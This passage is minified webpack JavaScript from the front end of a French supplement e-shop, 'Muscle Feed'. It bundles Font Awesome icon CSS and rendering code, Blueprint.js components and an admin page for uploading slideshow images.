M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})},Vc=r({},Mc,{attributeName:"opacity"});r({},dc,{cx:"256",cy:"364",r:"28"}),r({},Mc,{attributeName:"r",values:"28;14;28;28;14;28;"}),r({},Vc,{values:"1;0;1;1;0;1;"}),r({},dc,{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),r({},Vc,{values:"1;0;0;0;0;1;"}),r({},dc,{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),r({},Vc,{values:"0;0;1;1;0;0;"}),w.styles;w.styles;var pc='svg:not(:root).svg-inline--fa {\n overflow: visible;\n}\n\n.svg-inline--fa {\n display: inline-block;\n font-size: inherit;\n height: 1em;\n overflow: visible;\n vertical-align: -0.125em;\n}\n.svg-inline--fa.fa-lg {\n vertical-align: -0.225em;\n}\n.svg-inline--fa.fa-w-1 {\n width: 0.0625em;\n}\n.svg-inline--fa.fa-w-2 {\n width: 0.125em;\n}\n.svg-inline--fa.fa-w-3 {\n width: 0.1875em;\n}\n.svg-inline--fa.fa-w-4 {\n width: 0.25em;\n}\n.svg-inline--fa.fa-w-5 {\n width: 0.3125em;\n}\n.svg-inline--fa.fa-w-6 {\n width: 0.375em;\n}\n.svg-inline--fa.fa-w-7 {\n width: 0.4375em;\n}\n.svg-inline--fa.fa-w-8 {\n width: 0.5em;\n}\n.svg-inline--fa.fa-w-9 {\n width: 0.5625em;\n}\n.svg-inline--fa.fa-w-10 {\n width: 0.625em;\n}\n.svg-inline--fa.fa-w-11 {\n width: 0.6875em;\n}\n.svg-inline--fa.fa-w-12 {\n width: 0.75em;\n}\n.svg-inline--fa.fa-w-13 {\n width: 0.8125em;\n}\n.svg-inline--fa.fa-w-14 {\n width: 0.875em;\n}\n.svg-inline--fa.fa-w-15 {\n width: 0.9375em;\n}\n.svg-inline--fa.fa-w-16 {\n width: 1em;\n}\n.svg-inline--fa.fa-w-17 {\n width: 1.0625em;\n}\n.svg-inline--fa.fa-w-18 {\n width: 1.125em;\n}\n.svg-inline--fa.fa-w-19 {\n width: 1.1875em;\n}\n.svg-inline--fa.fa-w-20 {\n width: 1.25em;\n}\n.svg-inline--fa.fa-pull-left {\n margin-right: 0.3em;\n width: auto;\n}\n.svg-inline--fa.fa-pull-right {\n margin-left: 0.3em;\n width: auto;\n}\n.svg-inline--fa.fa-border {\n height: 1.5em;\n}\n.svg-inline--fa.fa-li {\n width: 2em;\n}\n.svg-inline--fa.fa-fw {\n width: 1.25em;\n}\n\n.fa-layers svg.svg-inline--fa {\n bottom: 0;\n left: 0;\n margin: auto;\n position: absolute;\n right: 0;\n top: 0;\n}\n\n.fa-layers {\n display: inline-block;\n height: 1em;\n position: relative;\n text-align: center;\n vertical-align: -0.125em;\n width: 1em;\n}\n.fa-layers svg.svg-inline--fa {\n -webkit-transform-origin: center center;\n transform-origin: center center;\n}\n\n.fa-layers-counter, .fa-layers-text {\n display: inline-block;\n position: absolute;\n text-align: center;\n}\n\n.fa-layers-text {\n left: 50%;\n top: 50%;\n -webkit-transform: translate(-50%, -50%);\n transform: translate(-50%, -50%);\n -webkit-transform-origin: center center;\n transform-origin: center center;\n}\n\n.fa-layers-counter {\n background-color: #ff253a;\n border-radius: 1em;\n -webkit-box-sizing: border-box;\n box-sizing: border-box;\n color: #fff;\n height: 1.5em;\n line-height: 1;\n max-width: 5em;\n min-width: 1.5em;\n overflow: hidden;\n padding: 0.25em;\n right: 0;\n text-overflow: ellipsis;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top right;\n transform-origin: top right;\n}\n\n.fa-layers-bottom-right {\n bottom: 0;\n right: 0;\n top: auto;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: bottom right;\n transform-origin: bottom right;\n}\n\n.fa-layers-bottom-left {\n bottom: 0;\n left: 0;\n right: auto;\n top: auto;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: bottom left;\n transform-origin: bottom left;\n}\n\n.fa-layers-top-right {\n right: 0;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top right;\n transform-origin: top right;\n}\n\n.fa-layers-top-left {\n left: 0;\n right: auto;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top left;\n transform-origin: top left;\n}\n\n.fa-lg {\n font-size: 1.3333333333em;\n line-height: 0.75em;\n vertical-align: -0.0667em;\n}\n\n.fa-xs {\n font-size: 0.75em;\n}\n\n.fa-sm {\n font-size: 0.875em;\n}\n\n.fa-1x {\n font-size: 1em;\n}\n\n.fa-2x {\n font-size: 2em;\n}\n\n.fa-3x {\n font-size: 3em;\n}\n\n.fa-4x {\n font-size: 4em;\n}\n\n.fa-5x {\n font-size: 5em;\n}\n\n.fa-6x {\n font-size: 6em;\n}\n\n.fa-7x {\n font-size: 7em;\n}\n\n.fa-8x {\n font-size: 8em;\n}\n\n.fa-9x {\n font-size: 9em;\n}\n\n.fa-10x {\n font-size: 10em;\n}\n\n.fa-fw {\n text-align: center;\n width: 1.25em;\n}\n\n.fa-ul {\n list-style-type: none;\n margin-left: 2.5em;\n padding-left: 0;\n}\n.fa-ul > li {\n position: relative;\n}\n\n.fa-li {\n left: -2em;\n position: absolute;\n text-align: center;\n width: 2em;\n line-height: inherit;\n}\n\n.fa-border {\n border: solid 0.08em #eee;\n border-radius: 0.1em;\n padding: 0.2em 0.25em 0.15em;\n}\n\n.fa-pull-left {\n float: left;\n}\n\n.fa-pull-right {\n float: right;\n}\n\n.fa.fa-pull-left,\n.fas.fa-pull-left,\n.far.fa-pull-left,\n.fal.fa-pull-left,\n.fab.fa-pull-left {\n margin-right: 0.3em;\n}\n.fa.fa-pull-right,\n.fas.fa-pull-right,\n.far.fa-pull-right,\n.fal.fa-pull-right,\n.fab.fa-pull-right {\n margin-left: 0.3em;\n}\n\n.fa-spin {\n -webkit-animation: fa-spin 2s infinite linear;\n animation: fa-spin 2s infinite linear;\n}\n\n.fa-pulse {\n -webkit-animation: fa-spin 1s infinite steps(8);\n animation: fa-spin 1s infinite steps(8);\n}\n\n@-webkit-keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n\n@keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n.fa-rotate-90 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";\n -webkit-transform: rotate(90deg);\n transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";\n -webkit-transform: rotate(180deg);\n transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";\n -webkit-transform: rotate(270deg);\n transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";\n -webkit-transform: scale(-1, 1);\n transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n -webkit-transform: scale(1, -1);\n transform: scale(1, -1);\n}\n\n.fa-flip-both, .fa-flip-horizontal.fa-flip-vertical {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n -webkit-transform: scale(-1, -1);\n transform: scale(-1, -1);\n}\n\n:root .fa-rotate-90,\n:root .fa-rotate-180,\n:root .fa-rotate-270,\n:root .fa-flip-horizontal,\n:root .fa-flip-vertical,\n:root .fa-flip-both {\n -webkit-filter: none;\n filter: none;\n}\n\n.fa-stack {\n display: inline-block;\n height: 2em;\n position: relative;\n width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n bottom: 0;\n left: 0;\n margin: auto;\n position: absolute;\n right: 0;\n top: 0;\n}\n\n.svg-inline--fa.fa-stack-1x {\n height: 1em;\n width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n height: 2em;\n width: 2.5em;\n}\n\n.fa-inverse {\n color: #fff;\n}\n\n.sr-only {\n border: 0;\n clip: rect(0, 0, 0, 0);\n height: 1px;\n margin: -1px;\n overflow: hidden;\n padding: 0;\n position: absolute;\n width: 1px;\n}\n\n.sr-only-focusable:active, .sr-only-focusable:focus {\n clip: auto;\n height: auto;\n margin: 0;\n overflow: visible;\n position: static;\n width: auto;\n}';function Cc(){var c=V,e=p,t=b.familyPrefix,n=b.replacementClass,a=pc;if(t!==c||n!==e){var l=new RegExp("\\.".concat(c,"\\-"),"g"),s=new RegExp("\\.".concat(e),"g");a=a.replace(l,".".concat(t,"-")).replace(s,".".concat(n))}return a}function Lc(c){return{found:!0,width:c[0],height:c[1],icon:{tag:"path",attributes:{fill:"currentColor",d:c.slice(4)[0]}}}}function gc(){b.autoAddCss&&!wc&&(Q(Cc()),wc=!0)}function yc(c,e){return Object.defineProperty(c,"abstract",{get:e}),Object.defineProperty(c,"html",{get:function(){return c.abstract.map(function(c){return mc(c)})}}),Object.defineProperty(c,"node",{get:function(){if(H){var e=d.createElement("div");return e.innerHTML=c.html,e.children}}}),c}function Ac(c){var e=c.prefix,t=void 0===e?"fa":e,n=c.iconName;if(n)return zc(Sc.definitions,t,n)||zc(w.styles,t,n)}var bc,Sc=new(function(){function c(){!function(c,e){if(!(c instanceof e))throw new TypeError("Cannot call a class as a function")}(this,c),this.definitions={}}var e,t,n;return e=c,(t=[{key:"add",value:function(){for(var c=this,e=arguments.length,t=new Array(e),n=0;n<e;n++)t[n]=arguments[n];var a=t.reduce(this._pullDefinitions,{});Object.keys(a).forEach(function(e){c.definitions[e]=r({},c.definitions[e]||{},a[e]),function c(e,t){var n=(arguments.length>2&&void 0!==arguments[2]?arguments[2]:{}).skipHooks,a=void 0!==n&&n,l=Object.keys(t).reduce(function(c,e){var n=t[e];return n.icon?c[n.iconName]=n.icon:c[e]=n,c},{});"function"!=typeof w.hooks.addPack||a?w.styles[e]=r({},w.styles[e]||{},l):w.hooks.addPack(e,l),"fas"===e&&c("fa",t)}(e,a[e]),vc()})}},{key:"reset",value:function(){this.definitions={}}},{key:"_pullDefinitions",value:function(c,e){var t=e.prefix&&e.iconName&&e.icon?{0:e}:e;return Object.keys(t).map(function(e){var n=t[e],a=n.prefix,l=n.iconName,s=n.icon;c[a]||(c[a]={}),c[a][l]=s}),c}}])&&l(e.prototype,t),n&&l(e,n),c}()),wc=!1,Ec={transform:function(c){return uc(c)}},Nc=(bc=function(c){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},t=e.transform,n=void 0===t?$:t,a=e.symbol,l=void 0!==a&&a,s=e.mask,h=void 0===s?null:s,o=e.title,i=void 0===o?null:o,v=e.classes,z=void 0===v?[]:v,m=e.attributes,u=void 0===m?{}:m,f=e.styles,d=void 0===f?{}:f;if(c){var M=c.prefix,H=c.iconName,V=c.icon;return yc(r({type:"icon"},c),function(){return gc(),b.autoA11y&&(i?u["aria-labelledby"]="".concat(b.replacementClass,"-title-").concat(cc()):(u["aria-hidden"]="true",u.focusable="false")),sc({icons:{main:Lc(V),mask:h?Lc(h.icon):{found:!1,width:null,height:null,icon:{}}},prefix:M,iconName:H,transform:r({},$,n),symbol:l,title:i,extra:{attributes:u,styles:d,classes:z}})})}},function(c){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},t=(c||{}).icon?c:Ac(c||{}),n=e.mask;return n&&(n=(n||{}).icon?n:Ac(n||{})),bc(t,r({},e,{mask:n}))})}).call(this,t("yLpj"),t("URgk").setImmediate)},"7x2u":function(c,e,t){"use strict";t.d(e,"a",function(){return a}),t.d(e,"b",function(){return s});var n=t("mrSG"),a="Blueprint3",l=["active","alignText","containerRef","elementRef","fill","icon","inputRef","intent","inline","large","loading","leftIcon","minimal","onChildrenMount","onRemove","popoverProps","rightElement","rightIcon","round","small","text"];function s(c,e,t){return void 0===e&&(e=l),void 0===t&&(t=!1),t&&(e=e.concat(l)),e.reduce(function(c,e){return c.hasOwnProperty(e)&&delete c[e],c},n.a({},c))}},AFve:function(c,e,t){"use strict";t.d(e,"a",function(){return n});var n={NONE:"none",PRIMARY:"primary",SUCCESS:"success",WARNING:"warning",DANGER:"danger"}},BX3z:function(c,e,t){"use strict";t.r(e);var n=t("q1tI"),a=t.n(n),l=t("/MKj"),s=t("Ol7k"),r=t("ECub"),h=t("lE2V"),o=t("gBjE"),i=t("mrSG"),v=t("TSYQ"),z=t.n(v),m=t("xggJ"),u=t("0Cba"),f=t("7x2u"),d=function(c){function e(){var e=null!==c&&c.apply(this,arguments)||this;return e.handleInputChange=function(c){m.b.safeInvoke(e.props.onInputChange,c),m.b.safeInvoke(e.props.inputProps.onChange,c)},e}return i.c(e,c),e.prototype.render=function(){var c,e=this.props,t=e.className,a=e.disabled,l=e.fill,s=e.hasSelection,r=e.inputProps,h=e.large,o=(e.onInputChange,e.text),v=i.e(e,["className","disabled","fill","hasSelection","inputProps","large","onInputChange","text"]),m=z()(u.FILE_INPUT,((c={})[u.FILE_INPUT_HAS_SELECTION]=s,c[u.DISABLED]=a,c[u.FILL]=l,c[u.LARGE]=h,c),t);return n.createElement("label",i.a({},v,{className:m}),n.createElement("input",i.a({},r,{onChange:this.handleInputChange,type:"file",disabled:a})),n.createElement("span",{className:u.FILE_UPLOAD_INPUT},o))},e.displayName=f.a+".FileInput",e.defaultProps={hasSelection:!1,inputProps:{},text:"Choose file..."},e}(n.PureComponent),M=t("YTow"),H=t("QRwY"),V=t("7O5W"),p=t("IP2g"),C=t("twK/"),L=t("6dKc"),g=(t("WIwn"),t("sN95")),y=t("3NBp"),A=t("jGtb");t("o9iy");function b(c){return(b="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(c){return typeof c}:function(c){return c&&"function"==typeof Symbol&&c.constructor===Symbol&&c!==Symbol.prototype?"symbol":typeof c})(c)}function S(c,e){for(var t=0;t<e.length;t++){var n=e[t];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(c,n.key,n)}}function w(c){return(w=Object.setPrototypeOf?Object.getPrototypeOf:function(c){return c.__proto__||Object.getPrototypeOf(c)})(c)}function E(c){if(void 0===c)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return c}function N(c,e){return(N=Object.setPrototypeOf||function(c,e){return c.__proto__=e,c})(c,e)}var O=s.a.Content,T=(s.a.Footer,function(c){function e(c){var t,n,a;return function(c,e){if(!(c instanceof e))throw new TypeError("Cannot call a class as a function")}(this,e),n=this,(t=!(a=w(e).call(this,c))||"object"!==b(a)&&"function"!=typeof a?E(n):a).state={user:null,slideshow:null,products:null,image:"",name:"",uploading:!1},t.onSlideshow=t.onSlideshow.bind(E(t)),t.onSlideshowUpload=t.onSlideshowUpload.bind(E(t)),t}var t,l,i;return function(c,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function");c.prototype=Object.create(e&&e.prototype,{constructor:{value:c,writable:!0,configurable:!0}}),e&&N(c,e)}(e,n["Component"]),t=e,(l=[{key:"componentDidMount",value:function(){V.b.add(C.b,C.a);var c=this.props.dispatch;c(Object(A.i)()),c(Object(A.j)()),this.props.user&&"string"==typeof this.props.user&&this.setState({user:"string"==typeof this.props.user&&this.props.user.length>2?JSON.parse(this.props.user):this.props.user}),c(Object(A.j)()),this.props.products&&"string"==typeof this.props.products&&this.setState({products:"string"==typeof this.props.products&&this.props.products.length>2?JSON.parse(this.props.products):this.props.products}),this.props.slideshow&&"string"==typeof this.props.slideshow&&this.setState({slideshow:"string"==typeof this.props.slideshow&&this.props.slideshow.length>2?JSON.parse(this.props.slideshow):this.props.slideshow})}},{key:"componentDidUpdate",value:function(c){c.user!==this.props.user&&this.setState({user:JSON.parse(this.props.user)}),c.products!==this.props.products&&this.setState({products:"string"==typeof this.props.products&&this.props.products.length>2?JSON.parse(this.props.products):this.props.products}),c.slideshow!==this.props.slideshow&&this.setState({slideshow:"string"==typeof this.props.slideshow&&this.props.slideshow.length>2?JSON.parse(this.props.slideshow):this.props.slideshow})}},{key:"onSlideshowUpload",value:function(c,e){var t=e||c.target.files[0];this.setState({uploading:!0});var n=new FileReader,a=this;n.onload=function(c){a.setState({uploading:!1,image:c.target.result})},n.readAsDataURL(t)}},{key:"onSlideshow",value:function(){var c=this.props.dispatch,e=Math.random().toString(36).substr(2,9);c(Object(A.e)(e,this.state.image))}},{key:"render",value:function(){return a.a.createElement(a.a.Fragment,null,a.a.createElement(L.a,{title:null!==this.state.user?this.state.user.firstname+" "+this.state.user.lastname:"Muscle Feed | Administrateur",description:"Boutique en ligne de compléments alimentaires et de protéines pour la musculation à prix cassé. Le meilleur de la construction musculaire : proteines, gainer, bcaa, bruleur de graisses, booster."}),a.a.createElement(s.a,null,a.a.createElement(g.a,null),a.a.createElement(s.a,null,a.a.createElement(y.a,{user:JSON.stringify(this.state.user)}),a.a.createElement(O,{style:{backgroundColor:"#ffffff"},className:"product-global"},a.a.createElement("div",{className:"d-flex flex-row justify-content-center top-first-specifity mt-2 mb-1"},a.a.createElement("div",{className:"col-2"},a.a.createElement(h.a,{interactive:!0,className:"bp3-dark p-2",elevation:o.a.ONE},a.a.createElement("div",{className:"d-flex flex-row justify-content-space-between"},a.a.createElement(d,{placeholder:a.a.createElement("span",{className:"remember-text"},"Choisissez une image."),onChange:this.onSlideshowUpload,fill:!0})),a.a.createElement("div",{className:"d-flex flex-column"},a.a.createElement(M.a,{intent:"none",onClick:this.onSlideshow,loading:this.state.uploading,text:a.a.createElement("span",{className:"button-text"},"Envoyer  ",a.a.createElement(p.a,{icon:C.a}))}))),a.a.createElement(h.a,{interactive:!0,className:"bp3-dark p-2 mt-1 mb-1 d-flex flex-row justify-content-center align-items-center",elevation:o.a.ONE},(this.state.slideshow&&"string"==typeof this.state.slideshow&&this.state.slideshow.length<=2||!this.state.slideshow)&&a.a.createElement(r.a,{image:r.a.PRESENTED_IMAGE_SIMPLE,description:a.a.createElement("span",{className:"box-notfound-description"},"Aucune image"),className:"box-notfound-error mt-2"}),this.state.slideshow&&Array.isArray(this.state.slideshow)&&this.state.slideshow.map(function(c){return a.a.createElement("div",(e={className:"col-2 p-1",key:c.id},n="image-list-box-container p-1 ml-1",(t="className")in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e),a.a.createElement("img",{src:c.image,className:"image-list-box"}),a.a.createElement(M.a,{className:"delete-slideshow-image-button",intent:"danger",icon:a.a.createElement(H.a,{icon:"trash",iconSize:10})}));var e,t,n}))),a.a.createElement("div",{className:"col-10"}))))))}}])&&S(t.prototype,l),i&&S(t,i),e}());var x=Object(l.b)(function(c){var e=c.authenticationReducer,t=e.user,n=e.logged,a=c.adminReducer;return{user:t,logged:n,products:a.products,slideshow:a.slideshow}})(T);e.default=x},Fov3:function(c,e,t){"use strict";t.d(e,"a",function(){return s});var n=t("mrSG"),a=t("q1tI"),l=t("KNgm"),s=function(c){function e(e,t){var n=c.call(this,e,t)||this;return n.timeoutIds=[],n.clearTimeouts=function(){if(n.timeoutIds.length>0){for(var c=0,e=n.timeoutIds;c<e.length;c++){var t=e[c];window.clearTimeout(t)}n.timeoutIds=[]}},Object(l.isNodeEnv)("production")||n.validateProps(n.props),n}return n.c(e,c),e.prototype.componentWillReceiveProps=function(c){Object(l.isNodeEnv)("production")||this.validateProps(c)},e.prototype.componentWillUnmount=function(){this.clearTimeouts()},e.prototype.setTimeout=function(c,e){var t=window.setTimeout(c,e);return this.timeoutIds.push(t),function(){return window.clearTimeout(t)}},e.prototype.validateProps=function(c){},e}(a.PureComponent)},IP2g:function(c,e,t){"use strict";(function(c){t.d(e,"a",function(){return V});var n=t("7O5W"),a=t("17x9"),l=t.n(a),s=t("q1tI"),r=t.n(s);function h(c){return(h="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(c){return typeof c}:function(c){return c&&"function"==typeof Symbol&&c.constructor===Symbol&&c!==Symbol.prototype?"symbol":typeof c})(c)}function o(c,e,t){return e in c?Object.defineProperty(c,e,{value:t,enumerable:!0,configurable:!0,writable:!0}):c[e]=t,c}function i(c){for(var e=1;e<arguments.length;e++){var t=null!=arguments[e]?arguments[e]:{},n=Object.keys(t);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(t).filter(function(c){return Object.getOwnPropertyDescriptor(t,c).enumerable}))),n.forEach(function(e){o(c,e,t[e])})}return c}function v(c,e){if(null==c)return{};var t,n,a=function(c,e){if(null==c)return{};var t,n,a={},l=Object.keys(c);for(n=0;n<l.length;n++)t=l[n],e.indexOf(t)>=0||(a[t]=c[t]);return a}(c,e);if(Object.getOwnPropertySymbols){var l=Object.getOwnPropertySymbols(c);for(n=0;n<l.length;n++)t=l[n],e.indexOf(t)>=0||Object.prototype.propertyIsEnumerable.call(c,t)&&(a[t]=c[t])}return a}function z(c){return function(c){if(Array.isArray(c)){for(var e=0,t=new Array(c.length);e<c.length;e++)t[e]=c[e];return t}}(c)||function(c){if(Symbol.iterator in Object(c)||"[object Arguments]"===Object.prototype.toString.call(c))return Array.from(c)}(c)||function(){throw new TypeError("Invalid attempt to spread non-iterable instance")}()}var m="undefined"!=typeof window?window:void 0!==c?c:"undefined"!=typeof self?self:{};var u,f=(function(c){var e,t,n,a,l,s,r,h,o,i,v,z,u,f,d;e=m,t=function(c,e,n){if(!h(e)||i(e)||v(e)||z(e)||r(e))return e;var a,l=0,s=0;if(o(e))for(a=[],s=e.length;l<s;l++)a.push(t(c,e[l],n));else for(var m in a={},e)Object.prototype.hasOwnProperty.call(e,m)&&(a[c(m,n)]=t(c,e[m],n));return a},n=function(c){return u(c)?c:(c=c.replace(/[\-_\s]+(.)?/g,function(c,e){return e?e.toUpperCase():""})).substr(0,1).toLowerCase()+c.substr(1)},a=function(c){var e=n(c);return e.substr(0,1).toUpperCase()+e.substr(1)},l=function(c,e){return function(c,e){var t=(e=e||{}).separator||"_",n=e.split||/(?=[A-Z])/;return c.split(n).join(t)}(c,e).toLowerCase()},s=Object.prototype.toString,r=function(c){return"function"==typeof c},h=function(c){return c===Object(c)},o=function(c){return"[object Array]"==s.call(c)},i=function(c){return"[object Date]"==s.call(c)},v=function(c){return"[object RegExp]"==s.call(c)},z=function(c){return"[object Boolean]"==s.call(c)},u=function(c){return(c-=0)==c},f=function(c,e){var t=e&&"process"in e?e.process:e;return"function"!=typeof t?c:function(e,n){return t(e,c,n)}},d={camelize:n,decamelize:l,pascalize:a,depascalize:l,camelizeKeys:function(c,e){return t(f(n,e),c)},decamelizeKeys:function(c,e){return t(f(l,e),c,e)},pascalizeKeys:function(c,e){return t(f(a,e),c)},depascalizeKeys:function(){return this.decamelizeKeys.apply(this,arguments)}},c.exports?c.exports=d:e.humps=d}(u={exports:{}},u.exports),u.exports);var d=!1;try{d=!0}catch(C){}function M(c,e){return Array.isArray(e)&&e.length>0||!Array.isArray(e)&&e?o({},c,e):{}}function H(c){return null===c?null:"object"===h(c)&&c.prefix&&c.iconName?c:Array.isArray(c)&&2===c.length?{prefix:c[0],iconName:c[1]}:"string"==typeof c?{prefix:"fas",iconName:c}:void 0}function V(c){var e=c.icon,t=c.mask,a=c.symbol,l=c.className,s=c.title,r=H(e),h=M("classes",[].concat(z(function(c){var e,t=(o(e={"fa-spin":c.spin,"fa-pulse":c.pulse,"fa-fw":c.fixedWidth,"fa-inverse":c.inverse,"fa-border":c.border,"fa-li":c.listItem,"fa-flip-horizontal":"horizontal"===c.flip||"both"===c.flip,"fa-flip-vertical":"vertical"===c.flip||"both"===c.flip},"fa-".concat(c.size),null!==c.size),o(e,"fa-rotate-".concat(c.rotation),null!==c.rotation),o(e,"fa-pull-".concat(c.pull),null!==c.pull),e);return Object.keys(t).map(function(c){return t[c]?c:null}).filter(function(c){return c})}(c)),z(l.split(" ")))),v=M("transform","string"==typeof c.transform?n.c.transform(c.transform):c.transform),m=M("mask",H(t)),u=Object(n.a)(r,i({},h,v,m,{symbol:a,title:s}));if(!u)return function(){var c;!d&&console&&"function"==typeof console.error&&(c=console).error.apply(c,arguments)}("Could not find icon",r),null;var f=u.abstract,C={};return Object.keys(c).forEach(function(e){V.defaultProps.hasOwnProperty(e)||(C[e]=c[e])}),p(f[0],C)}V.displayName="FontAwesomeIcon",V.propTypes={border:l.a.bool,className:l.a.string,mask:l.a.oneOfType([l.a.object,l.a.array,l.a.string]),fixedWidth:l.a.bool,inverse:l.a.bool,flip:l.a.oneOf(["horizontal","vertical","both"]),icon:l.a.oneOfType([l.a.object,l.a.array,l.a.string]),listItem:l.a.bool,pull:l.a.oneOf(["right","left"]),pulse:l.a.bool,rotation:l.a.oneOf([90,180,270]),size:l.a.oneOf(["lg","xs","sm","1x","2x","3x","4x","5x","6x","7x","8x","9x","10x"]),spin:l.a.bool,symbol:l.a.oneOfType([l.a.bool,l.a.string]),title:l.a.string,transform:l.a.oneOfType([l.a.string,l.a.object])},V.defaultProps={border:!1,className:"",mask:null,fixedWidth:!1,inverse:!1,flip:null,icon:null,listItem:!1,pull:null,pulse:!1,rotation:null,size:null,spin:!1,symbol:!1,title:"",transform:null};var p=function c(e,t){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};if("string"==typeof t)return t;var a=(t.children||[]).map(function(t){return c(e,t)}),l=Object.keys(t.attributes||{}).reduce(function(c,e){var n=t.attributes[e];switch(e){case"class":c.attrs.className=n,delete t.attributes.class;break;case"style":c.attrs.style=n.split(";").map(function(c){return c.trim()}).filter(function(c){return c}).reduce(function(c,e){var t,n=e.indexOf(":"),a=f.camelize(e.slice(0,n)),l=e.slice(n+1).trim();return a.startsWith("webkit")?c[(t=a,t.charAt(0).toUpperCase()+t.slice(1))]=l:c[a]=l,c},{});break;default:0===e.indexOf("aria-")||0===e.indexOf("data-")?c.attrs[e.toLowerCase()]=n:c.attrs[f.camelize(e)]=n}return c},{attrs:{}}),s=n.style,r=void 0===s?{}:s,h=v(n,["style"]);return l.attrs.style=i({},l.attrs.style,r),e.apply(void 0,[t.tag,i({},l.attrs,h)].concat(z(a)))}.bind(null,r.a.createElement)}).call(this,t("yLpj"))},KNgm:function(c,e,t){"use strict";t.r(e),function(c){t.d(e,"isNodeEnv",function(){return r}),t.d(e,"isFunction",function(){return h}),t.d(e,"isReactNodeEmpty",function(){return o}),t.d(e,"ensureElement",function(){return i}),t.d(e,"isReactElement",function(){return v}),t.d(e,"getDisplayName",function(){return z}),t.d(e,"isElementOfType",function(){return m}),t.d(e,"safeInvoke",function(){return u}),t.d(e,"safeInvokeOrValue",function(){return f}),t.d(e,"elementIsOrContains",function(){return d}),t.d(e,"arrayLengthCompare",function(){return M}),t.d(e,"approxEqual",function(){return H}),t.d(e,"clamp",function(){return V}),t.d(e,"countDecimalPlaces",function(){return p}),t.d(e,"throttleEvent",function(){return C}),t.d(e,"throttleReactEventCallback",function(){return L}),t.d(e,"throttle",function(){return g});var n=t("q1tI"),a=t("a26C"),l=t("lSzl");t.d(e,"arraysEqual",function(){return l.a}),t.d(e,"shallowCompareKeys",function(){return l.e}),t.d(e,"deepCompareKeys",function(){return l.b}),t.d(e,"getShallowUnequalKeyValues",function(){return l.d}),t.d(e,"getDeepUnequalKeyValues",function(){return l.c});var s=t("6K+m");function r(e){return void 0!==c&&c.env&&"production"===e}function h(c){return"function"==typeof c}function o(c,e){return void 0===e&&(e=!1),null==c||""===c||!1===c||!e&&Array.isArray(c)&&(0===c.length||c.every(function(c){return o(c,!0)}))}function i(c,e){return void 0===e&&(e="span"),null==c||"boolean"==typeof c?void 0:"string"==typeof c?c.trim().length>0?n.createElement(e,{},c):void 0:"number"==typeof c||"symbol"==typeof c.type||Array.isArray(c)?n.createElement(e,{},c):v(c)?c:void 0}function v(c){return"object"==typeof c&&void 0!==c.type&&void 0!==c.props}function z(c){return c.displayName||c.name||"Unknown"}function m(c,e){return null!=c&&null!=c.type&&null!=c.type.displayName&&c.type.displayName===e.displayName}function u(c){for(var e=[],t=1;t<arguments.length;t++)e[t-1]=arguments[t];if(h(c))return c.apply(void 0,e)}function f(c){for(var e=[],t=1;t<arguments.length;t++)e[t-1]=arguments[t];return h(c)?c.apply(void 0,e):c}function d(c,e){return c===e||c.contains(e)}function M(c,e){return void 0===c&&(c=[]),void 